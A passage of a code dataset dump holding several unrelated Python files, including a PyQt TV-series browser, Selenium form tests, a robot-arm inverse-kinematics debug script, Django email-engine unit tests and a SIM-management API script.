TVDB\"\n if episode < 10:\n episode_no = \"0\" + str(episode)\n else:\n episode_no = str(episode)\n self.episode_list.addItem(episode_no + \" \" + episodename)\n self.wait_window.close()\n \n @Slot()\n def change_episode_selection(self):\n current_series = self.series_list.currentItem().text()\n current_season = self.season_sel.currentText()\n if current_season == '':\n current_season = 1\n else:\n current_season = int(current_season)\n try:\n current_episode = int(self.episode_list.currentItem().text()[:2])\n except:\n current_episode = 1\n # Name\n self.episode_name.setText(seriesfinder.get_episode_name(current_series, current_season, current_episode))\n\n # Description\n description = seriesfinder.get_episode_info(current_series, current_season, current_episode)\n if description == None:\n description = \"No description available.\"\n self.episode_info_text.setText(\"Description: \" + description)\n\n # Air date\n air_date = seriesfinder.get_air_date(current_series, current_season, current_episode)\n if air_date == None:\n self.episode_airdate.setText(\"Originally aired: unknown\")\n else:\n self.episode_airdate.setText(\"Originally aired: \" + air_date)\n\n # Rating\n rating = seriesfinder.get_episode_rating(current_series, current_season, current_episode)\n if rating == None:\n rating = \"TVDB-Rating: No rating available for this episode\"\n self.episode_rating.setText(rating)\n else:\n self.episode_rating.setText(\"TVDB-Rating: \" + rating)\n\n # Banner\n try:\n banner = seriesfinder.get_episode_image(current_series, current_season, current_episode)\n self.episode_banner.setPixmap(banner)\n except:\n self.episode_banner.setText(\"(No banner available)\")\n \n \n @Slot()\n def exit_app(self):\n reply = QMessageBox.question(self, 'Message',\n \"Are you sure to quit?\", QMessageBox.Yes |\n QMessageBox.No, QMessageBox.No)\n\n if reply == QMessageBox.Yes:\n grabber_app.quit()\n\n\n @Slot()\n def open_finder(self):\n self.finder.show()\n\n \n def reset_series_list_font(self):\n self.series_list.setFont(QFont(\"Calibri\", 12))\n\n def get_current_selection(self):\n current_sel = self.series_list.currentRow()\n return current_sel\n\n def clearLayout(layout):\n while layout.count():\n child = layout.takeAt(0)\n if child.widget() is not None:\n child.widget().deleteLater()\n elif child.layout() is not None:\n self.clearLayout(child.layout())\n\n def run(self):\n ''' Show the application window and start the main event loop '''\n self.show()\n grabber_app.exec_()\n\nif __name__ == '__main__':\n app = SeriesGrabberGUI()\n app.run()","sub_path":"old trys/gui_new_layout.py","file_name":"gui_new_layout.py","file_ext":"py","file_size_in_byte":15986,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"453692552","text":"import csv\nimport os\n\nfrom selenium import webdriver\nimport time\n\ndriver = webdriver.Chrome()\n\ndriver.get('http://localhost:9999/another_form.html')\n\ndef find_and_clear(id):\n element = driver.find_element_by_id(id)\n element.clear()\n return element\n\ninput_csv_content = []\n\nwith open('table_in.csv', encoding='utf-8') as csvfile:\n input_csv = csv.reader(csvfile, delimiter=',') # megadjuk, hogy mit olvasson a csv olvasó, valamint azt, hogy milyen elválasztót használtunk( ez lehet , és ; stb)\n next(input_csv) # erre azért van szükség, mert az első sor csak a fejléc konkrét értékeket nem tartalmaz\n for row in input_csv:\n input_csv_content.append(row)\n find_and_clear(\"fullname\").send_keys(row[0])\n\n find_and_clear(\"email\").send_keys(row[1])\n\n find_and_clear(\"dob\").send_keys(row[2])\n\n find_and_clear(\"phone\").send_keys(row[3])\n\n submit = driver.find_element_by_id(\"submit\")\n submit.click()\n\n\n\n # name = driver.find_element_by_id(\"fullname\")\n # name.clear()\n # name.send_keys(row[0])\n # time.sleep(2)\n #\n # email = driver.find_element_by_id(\"email\")\n # email.clear()\n # email.send_keys(row[1])\n # time.sleep(2)\n #\n # dob = driver.find_element_by_id(\"dob\")\n # dob.clear()\n # dob.send_keys(row[2])\n # time.sleep(2)\n #\n # phone = driver.find_element_by_id(\"phone\")\n # phone.clear()\n # phone.send_keys(row[3])\n # time.sleep(2)\n #\n # submit = driver.find_element_by_id(\"submit\")\n # submit.click()\n\ndriver.find_element_by_xpath(\"/html/body/main/div/button\").click()\n# export_button.click()\ntime.sleep(1)\n\n\n\n\n# table_list = driver.find_elements_by_xpath(\"//table[@id='detailsTable']/tbody/tr\")\n\n# for row in table_list:\n# cells = row.find_elements_by_tag_name(\"td\")\n# # print(cells[0].text, cells[1].text, cells[2].text)\n# print(type(cells))\n# print(cells[0])\n\nresult_csv_content = []\n\nwith open(\"C:\\\\Users\\\\czink\\\\Downloads\\\\table.csv\", encoding='utf-8') as result_file:\n result_csv = csv.reader(result_file, delimiter=',') # megadjuk, hogy mit olvasson a csv olvasó, valamint azt, hogy milyen elválasztót használtunk( ez lehet , és ; stb)\n print(result_csv)\n next(result_csv) # erre azért van szükség, mert az első sor csak a fejléc konkrét értékeket nem tartalmaz\n for row in result_csv:\n result_csv_content.append(row)\n\n\nprint(type(input_csv_content))\nprint(input_csv_content)\nprint(type(result_csv_content))\nprint(result_csv_content)\n\n\n\nassert input_csv_content == result_csv_content\n\n\nos.remove(\"C:\\\\Users\\\\czink\\\\Downloads\\\\table.csv\") #töröljük a legenerált csv, hogy újra ismételhető legyen a teszt\n\n\n\ntime.sleep(2)\n\ndriver.close()","sub_path":"selenium2-homework/csvfeltoltes.py","file_name":"csvfeltoltes.py","file_ext":"py","file_size_in_byte":2865,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"438112710","text":"# Program: plot_random.py\r\n\r\nfrom graphics import *\r\nfrom random import *\r\nimport math\r\n\r\ndef main():\r\n\r\n win = GraphWin(\"2d Random Walk\", 650, 650)\r\n win.setCoords(-100.0,-100.0,100.0,100.0)\r\n\r\n # Draw the interface.\r\n\r\n Text(Point(-20,-70), \"Enter the number of steps for the random walk: \").draw(win)\r\n input = Entry(Point(45,-70),10)\r\n input.setText(\"1\")\r\n input.draw(win)\r\n\r\n button = Text(Point(0,-85),\"Start the Simulation\")\r\n button.draw(win)\r\n Rectangle(Point(-25,-90),Point(25,-80)).draw(win)\r\n\r\n # Wait for a mouse click.\r\n \r\n win.getMouse()\r\n\r\n # Change the button.\r\n\r\n button.setText(\"Simulation in Progress\")\r\n\r\n # Get the number of steps from the Entry box.\r\n \r\n N = eval(input.getText())\r\n\r\n # (x, y) gives the location of the sailor. (x_new,y_new)\r\n # gives the new location after taking one step. r gives\r\n # the length of a step.\r\n\r\n x = 0\r\n y = 0\r\n x_new = 0\r\n y_new = 0\r\n\r\n # NB. Pick r so that it divides into 90 AND 60 to give a whole nunmber.\r\n # So r = 1,2,3,5,6,10,15,30 are all acceptable.\r\n\r\n r = 3\r\n\r\n # It's a bit complicated because you have to deal with the four\r\n # corners and the four edges separately. When the sailor gets to\r\n # a corner, he only has two options. At an edge, he has three options.\r\n # In the interior, he has four options. \r\n\r\n for i in range(N):\r\n theta = 2*math.pi*random()\r\n R = 65\r\n D = (x_new**2+y_new**2)**0.5\r\n x_new = x+r*math.cos(theta)\r\n y_new = y+r*math.sin(theta)\r\n if D>R:\r\n x_new = x_new*R/D\r\n y_new = y_new*R/D\r\n \r\n p = Point(x,y)\r\n q = Point(x_new,y_new)\r\n l = Line(p,q)\r\n l.draw(win)\r\n x = x_new\r\n y = y_new\r\n\r\n\r\n # Change the button.\r\n\r\n button.setText(\"Quit\")\r\n\r\n # Wait for click and then quit.\r\n\r\n win.getMouse()\r\n win.close()\r\n \r\nif __name__=='__main__':main()\r\n","sub_path":"tutorials/Intro to Computer Science with python_NUIG/Projects/random_walk.py","file_name":"random_walk.py","file_ext":"py","file_size_in_byte":1972,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"144879421","text":"import ipaddress\n\nimport ssmc\nfrom examples.util import set_env, get_logger, measure\n\nlogger = get_logger()\n# logger.setLevel(logging.INFO)\n\n# get config\nconf = set_env()\n\n# create api client\napi = ssmc.APIClient(token=conf.token, secret=conf.secret, zone=conf.zone, debug=conf.debug)\n\n# const\n# L2_MODE_START_IP = ipaddress.IPv4Address('10.0.1.1')\nL3_MODE_START_IP = ipaddress.IPv4Address('10.16.1.1')\n\nmgws, pagging = api.list_mgws()\nmgw = mgws[0]\n\n# activate sim\nsize, offset = 5000, 0\niter_num = 0\nwith measure(f\"assign sims - size={size}\", logger):\n while True:\n sims, paging = api.list_sims(size=size, offset=offset)\n total = paging.total\n offset = paging.size + paging.offset\n\n with measure(f\"setup sims: num_of_sims={len(sims)}\", logger):\n for sim in sims:\n iter_num += 1\n\n # get sim status for check PUT request\n sim_status = api.get_sim_status(sim.id)\n # activate sim\n if not sim_status.activated:\n with measure(f\"activate_sim: total={total}, sim_id={sim.id}\", logger):\n api.activate_sim(sim.id)\n # assign to mgw\n if sim_status.simgroup_id is None:\n with measure(f\"assign_sim_to_mgw: total={total}, sim_id={sim.id}, mgw_id={mgw.id}\", logger):\n api.assign_sim_to_mgw(mgw.id, sim.id)\n # set ip\n if sim_status.ip is None:\n with measure(f\"set_ip: total={total}, sim_id={sim.id}\", logger):\n api.set_ip(sim_id=sim.id, ip=str(L3_MODE_START_IP + iter_num))\n # imei lock\n dummy_imei = \"123456789012345\"\n if not sim_status.imei_lock:\n with measure(f\"lock_imei: total={total}, sim_id={sim.id}\", logger):\n api.lock_imei(sim_id=sim.id, imei=dummy_imei)\n\n if offset >= total:\n break\n","sub_path":"examples/assign_sim_to_mgw.py","file_name":"assign_sim_to_mgw.py","file_ext":"py","file_size_in_byte":1987,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"112884923","text":"from sympy import *\nfrom time import time\nfrom mpmath import radians, pi\nimport tf\n\n'''\nFormat of test case is [ [[EE position],[EE orientation as quaternions]],[WC location],[joint angles]]\nYou can generate additional test cases by setting up your kuka project and running `$ roslaunch kuka_arm forward_kinematics.launch`\nFrom here you can adjust the joint angles to find thetas, use the gripper to extract positions and orientation (in quaternion xyzw) and lastly use link 5\nto find the position of the wrist center. These newly generated test cases can be added to the test_cases dictionary.\n'''\n\ntest_cases = {1:[[[2.16135,-1.42635,1.55109],\n [0.708611,0.186356,-0.157931,0.661967]],\n [1.89451,-1.44302,1.69366],\n [-0.65,0.45,-0.36,0.95,0.79,0.49]],\n 2:[[[-0.56754,0.93663,3.0038],\n [0.62073, 0.48318,0.38759,0.480629]],\n [-0.638,0.64198,2.9988],\n [-0.79,-0.11,-2.33,1.94,1.14,-3.68]],\n 3:[[[-1.3863,0.02074,0.90986],\n [0.01735,-0.2179,0.9025,0.371016]],\n [-1.1669,-0.17989,0.85137],\n [-2.99,-0.12,0.94,4.06,1.29,-4.12]],\n 4:[],\n 5:[]}\n\n## Helper rotation functions\ndef rot_x(angle):\n return N(Matrix([[ 1, 0, 0, 0],\n [ 0, cos(angle), -sin(angle), 0],\n [ 0, sin(angle), cos(angle), 0],\n [ 0, 0, 0, 1]]))\n\ndef rot_z(angle):\n return N(Matrix([[ cos(angle), -sin(angle), 0, 0],\n [ sin(angle), cos(angle), 0, 0],\n [ 0, 0, 1, 0],\n [ 0, 0, 0, 1]]))\n\ndef rot_y(angle):\n return N(Matrix([[ cos(angle), 0, sin(angle), 0],\n [ 0, 1, 0, 0],\n [ -sin(angle), 0, cos(angle), 0],\n [ 0, 0, 0, 1]]))\n\n# Calculates the norm only for the 3 first coordinates (useful for 4d vecs)\ndef norm3d(vec):\n return Matrix(vec[0:3]).norm()\n\n# Variable DH params (related to joint angles)\nq1, q2, q3, q4, q5, q6, q7 = symbols('q1:8') # theeta values of dh-params\njoint_vals = {q1: 0, q2: -pi/2, q3: 0, q4: 0, q5: 0, q6: 0, q7: 0} # updated when q changes\n\n# Kuka KR210 constant DH params\na0, a1, a2, a3, a4, a5, a6 = 0, 0.35, 1.25, -0.054, 0, 0, 0\nd1 = 0.33 + 0.427 # floor to joint 2 height\nd4 = 0.96 + 0.54 # z3 to wrist center horizontal distance\nd7 = 0.11 + 0.193 # wrist center to end-effector distance\nd2, d3, d5, d6 = 0, 0, 0, 0\np0, p1, p2, p3, p4, p5, p6 = 0, -pi/2, 0, -pi/2, pi/2, -pi/2, 0\n\n# some useful distances\nd3_wc = sqrt(a3**2 + d4**2) # joint 3 to wrist-center distance\nd2_3 = a2 # distance from joint 2 to 3\n\n# Transformation matrices (most of them could be very simplified)\nT0_1 = Matrix([[cos(q1), -sin(q1), 0, a0 ],\n [sin(q1)*cos(p0), cos(q1)*cos(p0), -sin(p0), -sin(p0)*d1],\n [sin(q1)*sin(p0), cos(q1)*sin(p0), cos(p0), cos(p0)*d1 ],\n [ 0, 0, 0, 1 ]])\n\nT1_2 = Matrix([[cos(q2), -sin(q2), 0, a1 ],\n [sin(q2)*cos(p1), cos(q2)*cos(p1), -sin(p1), -sin(p1)*d2],\n [sin(q2)*sin(p1), cos(q2)*sin(p1), cos(p1), cos(p1)*d2 ],\n [ 0, 0, 0, 1 ]])\n\nT2_3 = Matrix([[cos(q3), -sin(q3), 0, a2 ],\n [sin(q3)*cos(p2), cos(q3)*cos(p2), -sin(p2), -sin(p2)*d3],\n [sin(q3)*sin(p2), cos(q3)*sin(p2), cos(p2), cos(p2)*d3 ],\n [ 0, 0, 0, 1 ]])\n\nT3_4 = Matrix([[cos(q4), -sin(q4), 0, a3 ],\n [sin(q4)*cos(p3), cos(q4)*cos(p3), -sin(p3), -sin(p3)*d4],\n [sin(q4)*sin(p3), cos(q4)*sin(p3), cos(p3), cos(p3)*d4 ],\n [ 0, 0, 0, 1 ]])\n\nT4_5 = Matrix([[cos(q5), -sin(q5), 0, a4 ],\n [sin(q5)*cos(p4), cos(q5)*cos(p4), -sin(p4), -sin(p4)*d5],\n [sin(q5)*sin(p4), cos(q5)*sin(p4), cos(p4), cos(p4)*d5 ],\n [ 0, 0, 0, 1 ]])\n\nT5_6 = Matrix([[cos(q6), -sin(q6), 0, a5 ],\n [sin(q6)*cos(p5), cos(q6)*cos(p5), -sin(p5), -sin(p5)*d6],\n [sin(q6)*sin(p5), cos(q6)*sin(p5), cos(p5), cos(p5)*d6 ],\n [ 0, 0, 0, 1 ]])\n\nT6_7 = Matrix([[cos(q7), -sin(q7), 0, a6 ],\n [sin(q7)*cos(p6), cos(q7)*cos(p6), -sin(p6), -sin(p6)*d7],\n [sin(q7)*sin(p6), cos(q7)*sin(p6), cos(p6), cos(p6)*d7 ],\n [ 0, 0, 0, 1 ]])\n\n# Correction matrices from/to Gazebo coords to DH coords\nR_gazebo_to_dh = N(simplify(rot_x(pi) * rot_y(pi/2)))\nR_dh_to_gazebo = N(simplify(rot_z(pi) * rot_y(-pi/2)))\n\n# Extract rotation matrices from the transformation matrices\nR0_1 = T0_1[0:3, 0:3]\nR1_2 = T1_2[0:3, 0:3]\nR2_3 = T2_3[0:3, 0:3]\nR3_4 = T3_4[0:3, 0:3]\nR4_5 = T4_5[0:3, 0:3]\nR5_6 = T5_6[0:3, 0:3]\nR6_7 = T6_7[0:3, 0:3]\n\n\ndef test_code(test_case):\n ## Set up code\n ## Do not modify!\n x = 0\n class Position:\n def __init__(self,EE_pos):\n self.x = EE_pos[0]\n self.y = EE_pos[1]\n self.z = EE_pos[2]\n class Orientation:\n def __init__(self,EE_ori):\n self.x = EE_ori[0]\n self.y = EE_ori[1]\n self.z = EE_ori[2]\n self.w = EE_ori[3]\n\n position = Position(test_case[0][0])\n orientation = Orientation(test_case[0][1])\n\n class Combine:\n def __init__(self,position,orientation):\n self.position = position\n self.orientation = orientation\n\n comb = Combine(position,orientation)\n\n class Pose:\n def __init__(self,comb):\n self.poses = [comb]\n\n req = Pose(comb)\n start_time = time()\n \n ########################################################################################\n ## \n\n ## Insert IK code here!\n px = req.poses[0].position.x\n py = req.poses[0].position.y\n pz = req.poses[0].position.z\n (roll, pitch, yaw) = tf.transformations.euler_from_quaternion(\n [req.poses[x].orientation.x, req.poses[x].orientation.y,\n req.poses[x].orientation.z, req.poses[x].orientation.w])\n\n ### Your IK code here\n p_end_effector = N(Matrix([[px], [py], [pz], [1]]))\n\n # Calculate joint angles using Geometric IK method\n Rrpy_gazebo = N(rot_z(yaw) * rot_y(pitch) * rot_x(roll))\n versor_x_gazebo = Rrpy_gazebo[:, 0]\n p_wc = N(p_end_effector - versor_x_gazebo * d7) # wrist-center position\n theta1 = atan2(p_wc[1], p_wc[0])\n # Position of joint-2 (x, y, z and placeholder for 4th coord)\n p_j2 = Matrix([a1 * cos(theta1), a1 * sin(theta1), d1, 0])\n vec_j2_to_wc = p_wc - p_j2 # vector from joint-2 to wrist-center\n d2_wc = norm3d(vec_j2_to_wc) # distance from joint 2 to wrist-center\n\n # Calculate inner angles from triangle between joint 2, joint 3 and wrist-center\n inner_j2 = acos((d2_3**2 + d2_wc**2 - d3_wc**2)/(2*d2_3*d2_wc))\n inner_j3 = acos((d2_3**2 + d3_wc**2 - d2_wc**2)/(2*d2_3*d3_wc))\n\n # Having triangle inner angles, calculate needed joint angles\n angle_wc_j2 = asin(vec_j2_to_wc[2]/d2_wc) # angle between WC and the horiz-plane at j2\n theta2 = pi/2 - (inner_j2 + angle_wc_j2) # theta2 = 0 is 90 degrees with horiz-plane\n angle_offset_wc_j3 = atan2(-a3, d4)\n theta3 = pi/2 - (inner_j3 + angle_offset_wc_j3)\n\n dh_theta1 = theta1\n dh_theta2 = theta2 - pi/2\n dh_theta3 = theta3\n R0_3 = N(R0_1.subs({q1: dh_theta1}))\\\n * N(R1_2.subs({q2: dh_theta2}))\\\n * N(R2_3.subs({q3: dh_theta3}))\n\n Rrpy_dh = Rrpy_gazebo * R_dh_to_gazebo\n R0_3_inv = R0_3.transpose() # orthonormal matrix: inv() = transpose()\n R3_6 = R0_3_inv * Rrpy_dh[0:3, 0:3]\n theta5 = N(atan2(sqrt(R3_6[0, 2]**2 + R3_6[2, 2]**2), R3_6[1, 2]))\n theta4 = atan2(R3_6[2,2], -R3_6[0,2])\n theta6 = atan2(-R3_6[1,1],R3_6[1,0])\n dh_theta4 = theta4\n dh_theta5 = theta5\n dh_theta6 = theta6\n\n ## \n ########################################################################################\n \n ########################################################################################\n ## For additional debugging add your forward kinematics here. Use your previously calculated thetas\n ## as the input and output the position of your end effector as your_ee = [x,y,z]\n\n ## (OPTIONAL) YOUR CODE HERE!\n\n ## End your code input for forward kinematics here!\n ########################################################################################\n\n ## For error analysis please set the following variables of your WC location and EE location in the format of [x,y,z]\n your_ee = N(T0_1.subs({q1: dh_theta1}))\\\n * N(T1_2.subs({q2: dh_theta2}))\\\n * N(T2_3.subs({q3: dh_theta3}))\\\n * N(T3_4.subs({q4: dh_theta4}))\\\n * N(T4_5.subs({q5: dh_theta5}))\\\n * N(T5_6.subs({q6: dh_theta6}))\\\n * N(T6_7.subs({q7: 0}))\\\n * Matrix([0, 0, 0, 1])\n your_wc = [p_wc[0],p_wc[1],p_wc[2]] # <--- Load your calculated WC values in this array\n ########################################################################################\n\n ## Error analysis\n print (\"\\nTotal run time to calculate joint angles from pose is %04.4f seconds\" % (time()-start_time))\n\n # Find WC error\n if not(sum(your_wc)==3):\n wc_x_e = abs(your_wc[0]-test_case[1][0])\n wc_y_e = abs(your_wc[1]-test_case[1][1])\n wc_z_e = abs(your_wc[2]-test_case[1][2])\n wc_offset = sqrt(wc_x_e**2 + wc_y_e**2 + wc_z_e**2)\n print (\"\\nWrist error for x position is: %04.8f\" % wc_x_e)\n print (\"Wrist error for y position is: %04.8f\" % wc_y_e)\n print (\"Wrist error for z position is: %04.8f\" % wc_z_e)\n print (\"Overall wrist offset is: %04.8f units\" % wc_offset)\n\n # Find theta errors\n t_1_e = abs(theta1-test_case[2][0])\n t_2_e = abs(theta2-test_case[2][1])\n t_3_e = abs(theta3-test_case[2][2])\n t_4_e = abs(theta4-test_case[2][3])\n t_5_e = abs(theta5-test_case[2][4])\n t_6_e = abs(theta6-test_case[2][5])\n print (\"\\nTheta 1 error is: %04.8f\" % t_1_e)\n print (\"Theta 2 error is: %04.8f\" % t_2_e)\n print (\"Theta 3 error is: %04.8f\" % t_3_e)\n print (\"Theta 4 error is: %04.8f\" % t_4_e)\n print (\"Theta 5 error is: %04.8f\" % t_5_e)\n print (\"Theta 6 error is: %04.8f\" % t_6_e)\n print (\"\\n**These theta errors may not be a correct representation of your code, due to the fact \\\n \\nthat the arm can have muliple positions. It is best to add your forward kinmeatics to \\\n \\nconfirm whether your code is working or not**\")\n print (\" \")\n\n # Find FK EE error\n if not(sum(your_ee)==3):\n ee_x_e = abs(your_ee[0]-test_case[0][0][0])\n ee_y_e = abs(your_ee[1]-test_case[0][0][1])\n ee_z_e = abs(your_ee[2]-test_case[0][0][2])\n ee_offset = sqrt(ee_x_e**2 + ee_y_e**2 + ee_z_e**2)\n print (\"\\nEnd effector error for x position is: %04.8f\" % ee_x_e)\n print (\"End effector error for y position is: %04.8f\" % ee_y_e)\n print (\"End effector error for z position is: %04.8f\" % ee_z_e)\n print (\"Overall end effector offset is: %04.8f units \\n\" % ee_offset)\n\n\n\n\nif __name__ == \"__main__\":\n # Change test case number for different scenarios\n test_case_number = 1\n\n test_code(test_cases[test_case_number])\n","sub_path":"IK_debug.py","file_name":"IK_debug.py","file_ext":"py","file_size_in_byte":11857,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"74589136","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nimport base64\nfrom datetime import datetime, timedelta\nfrom email.mime.text import MIMEText\nimport os\n\nfrom django.contrib.auth.models import User\nfrom django.core import mail\nfrom django.test import TestCase\nfrom mock import mock\n\nfrom emailengine.base_email import BaseEmail, EmailSent\n\n\nclass TestEmail(BaseEmail):\n \"\"\"\n Email class for testing purposes\n \"\"\"\n\n email_type = 'please respond'\n subject = 'subject line'\n base_template_dir = 'emailengine/'\n body_template = 'base.html'\n html_template = 'base.html'\n\n\nclass BaseEmailTestCase(TestCase):\n \"\"\"\n Verify BaseEmail is saving, sending etc\n \"\"\"\n\n def setUp(self):\n self.user = User.objects.create(\n username='jdoe',\n email='jdoe@email.com'\n )\n\n EmailSent.objects.create(\n user_id=self.user.id,\n email_type='please respond',\n sent_datetime=datetime.today() - timedelta(days=2)\n )\n\n def attach_file(self, filenames):\n \"\"\"\n Helper function for attaching files\n \"\"\"\n attachments = []\n MY_DIR = os.path.join(os.path.dirname(__file__), 'testdata')\n\n for filename in filenames:\n filename = os.path.join(MY_DIR, filename)\n content = open(filename, 'rb').read()\n attachment = MIMEText(content, 'text/plain', 'utf-8')\n attachments.append(attachment)\n\n return attachments\n\n def test_send_daily_email(self):\n \"\"\"\n Verify max_frequency limits the frequency of emails sent\n \"\"\"\n class DailyEmail(TestEmail):\n max_frequency = timedelta(days=2)\n\n email_instance = DailyEmail()\n # send initial email\n email_instance.send_to_email(\n 'email@usersemail.com',\n email_from='fake_sender@fake.com',\n )\n self.assertIn('email@usersemail.com', mail.outbox[0].to[0])\n\n # simulate day passing, test email will not send during max_frequency\n yesterday = datetime.now() - timedelta(days=1)\n EmailSent.objects.update(sent_datetime=yesterday)\n\n email_instance2 = DailyEmail()\n was_sent2 = email_instance2.send_to_email(\n 'email@usersemail.com',\n email_from='fake_sender2@fake.com',\n )\n self.assertFalse(was_sent2)\n\n # test send_to_user will not send during max frequency\n email_instance3 = DailyEmail()\n was_sent3 = email_instance3.send_to_user(\n self.user,\n email_from='fake_sender2@fake.com',\n )\n self.assertFalse(was_sent3)\n\n # simulate days passing, test email sends again outside max_frequency\n dt_5_days_ago = datetime.now() - timedelta(days=5)\n EmailSent.objects.update(sent_datetime=dt_5_days_ago)\n\n email_instance4 = DailyEmail()\n was_sent4 = email_instance4.send_to_email(\n 'email@usersemail.com',\n email_from='fake_sender2@fake.com',\n )\n self.assertTrue(was_sent4)\n\n def test_email_count_limit(self):\n \"\"\"\n Verify max_send_cnt limits the number of emails sent\n \"\"\"\n class OneSendEmail(TestEmail):\n max_send_cnt = 1\n\n email_instance = OneSendEmail()\n email_instance.send_to_email(\n 'email@usersemail.com',\n email_from='fake_sender@fake.com',\n )\n self.assertIn('email@usersemail.com', mail.outbox[0].to[0])\n\n email_instance2 = OneSendEmail()\n was_sent2 = email_instance2.send_to_email(\n 'email@usersemail.com',\n email_from='fake_sender2@fake.com',\n )\n self.assertFalse(was_sent2)\n\n # test email does not send when using send_to_user and max_send_cnt\n email_instance3 = OneSendEmail()\n was_sent3 = email_instance3.send_to_user(\n self.user,\n email_from='fake_sender2@fake.com',\n )\n self.assertFalse(was_sent3)\n\n def test_email_from_name(self):\n \"\"\"\n Verify email_from_name is used/sent for email\n \"\"\"\n class EmailWithFromName(TestEmail):\n email_from_name = 'email_sender_name'\n\n email_instance = EmailWithFromName()\n was_sent = email_instance.send_to_user(\n self.user,\n email_from='fake_sender@fake.com',\n email_from_name='Bob',\n )\n self.assertTrue(was_sent)\n self.assertIn('Bob', mail.outbox[0].from_email)\n\n def test_send_with_cc(self):\n \"\"\"\n Test cc emails are included in send\n \"\"\"\n email_instance = TestEmail()\n email_instance.send_to_email(\n 'fake_sender@fake.com',\n cc_emails='email@cc.com',\n )\n self.assertIn('email@cc.com', mail.outbox[0].cc)\n\n def test_litmus_tracking_code(self):\n \"\"\"\n Verify litmus tracking code is added to context\n \"\"\"\n class EmailLitmusTracking(TestEmail):\n litmus_tracking_code = 1234\n\n email_instance = EmailLitmusTracking()\n email_instance.send_to_email('fake_sender@fake.com')\n self.assertIn('1234', mail.outbox[0].body)\n\n def test_attachments(self):\n \"\"\"\n Verify attachments passed in are actually attached to email\n \"\"\"\n email_instance = TestEmail()\n filenames = ['test_attachment.txt']\n attachments = self.attach_file(filenames)\n\n email_instance.send_smtp(\n context={'body': 'testbody'},\n email_from_string='fake@fakemail.com',\n email_to='fake_sender@fake.com',\n subject='subject line',\n attachments=attachments\n )\n\n self.assertEqual(len(mail.outbox), 1)\n self.assertIn(\n 'Content-Type',\n mail.outbox[0].attachments[0]._headers[0]\n )\n # check content of attachment\n self.assertIn(\n b'This file is for testing attachments.',\n base64.b64decode(mail.outbox[0].attachments[0].get_payload())\n )\n\n def test_record_send_no_email_type(self):\n \"\"\"\n Verify record_send returns None if there is no email_type\n \"\"\"\n class NoEmailType(TestEmail):\n email_type = None\n\n email_instance = NoEmailType()\n\n email_count = EmailSent.objects.count()\n value = email_instance.record_send(None, 'fake@fakemail.com')\n\n # check that email object count remains same, from setUp\n self.assertEqual(EmailSent.objects.count(), email_count)\n self.assertIsNone(value)\n\n @mock.patch('emailengine.base_email.BaseEmail.check_unsubscribed')\n def test_check_unsubscribed_true(self, mock_unsubscribed):\n \"\"\"\n Verify user does not receive email if unsubscribing\n \"\"\"\n email_instance = TestEmail()\n mock_unsubscribed.return_value = True\n\n was_sent = email_instance.send_to_email(\n 'fake@fakemail.com',\n email_from='fake_sender@fake.com',\n )\n self.assertFalse(was_sent)\n\n def test_unsubscribed_method(self):\n \"\"\"\n Verify check_unsubscribed returns False if ignore_subscription is true\n \"\"\"\n class IgnoreSubscription(TestEmail):\n ignore_subscription = True\n\n email_instance = IgnoreSubscription()\n self.assertFalse(email_instance.check_unsubscribed('mail@gm.com'))\n\n def test_get_context_data(self):\n \"\"\"\n Verify urls are added to context\n \"\"\"\n class UnsubscribeEmail(TestEmail):\n def unsubscribe_url(self, email):\n return 'test_url'\n\n email_instance = UnsubscribeEmail()\n context = email_instance.get_context_data(\n send_to_user=None,\n send_to_email='fake@fakemail.com'\n )\n self.assertDictContainsSubset(\n {'unsubscribe_url': 'test_url'},\n context\n )\n","sub_path":"emailengine/tests/test_base_email.py","file_name":"test_base_email.py","file_ext":"py","file_size_in_byte":7946,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"507718882","text":"from selenium.webdriver import Remote, DesiredCapabilities\nfrom webdriver_manager.manager import DriverManager\nfrom selenium.webdriver.firefox.firefox_profile import FirefoxProfile\nfrom selenium.webdriver.chrome.options import Options\n\n\nclass AbstractBrowser(object):\n def __init__(self,\n name,\n webdriver_class=None,\n webdriver_manager: DriverManager = None,\n desired_capabilities: DesiredCapabilities = None,\n firefox_profile: FirefoxProfile = None,\n chrome_options: Options = None,\n command_executor=None\n ):\n self.name = name\n self.chrome_options = chrome_options\n self.firefox_profile = firefox_profile\n self.command_executor = command_executor\n self.desired_capabilities = desired_capabilities\n self.webdriver_manager = webdriver_manager\n self.__web_driver = Remote(command_executor=command_executor,\n desired_capabilities=desired_capabilities,\n browser_profile=firefox_profile,\n keep_alive=True) if command_executor and not webdriver_manager \\\n else self.get_webdriver(webdriver_class=webdriver_class,\n webdriver_manager=webdriver_manager,\n desired_capabilities=desired_capabilities,\n firefox_profile=firefox_profile,\n chrome_options=chrome_options)\n\n def get_webdriver(self,\n webdriver_class,\n webdriver_manager: DriverManager,\n desired_capabilities: DesiredCapabilities = None,\n firefox_profile: FirefoxProfile = None,\n chrome_options: Options = None) -> Remote:\n call_options = {\"executable_path\": webdriver_manager.install()} if webdriver_manager else dict()\n if desired_capabilities:\n call_options[\"desired_capabilities\"] = desired_capabilities\n\n if firefox_profile:\n call_options[\"firefox_profile\"] = firefox_profile\n\n if chrome_options:\n call_options[\"options\"] = chrome_options\n\n return webdriver_class(**call_options)\n\n @property\n def web_driver(self):\n return self.__web_driver\n","sub_path":"browsers/abstract_browser.py","file_name":"abstract_browser.py","file_ext":"py","file_size_in_byte":2417,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"482347084","text":"import itertools as it\nimport random\n\nimport numpy as np\n\n# To find an energy minimum in this\n# net, start from a random state and\n# then update units one at a time in\n# random order.\n# – Update each unit to whichever\n# of its two states gives the\n# lowest global energy.\nn = 5\nV = list(it.product([0, 1], repeat=n))\ninit_V = random.randint(0, len(V))\nW = np.zeros((n, n), dtype=int)\nW[0][2] = W[1][2] = 1\nW[2][4] = W[2][3] = 2\nW[1][4] = 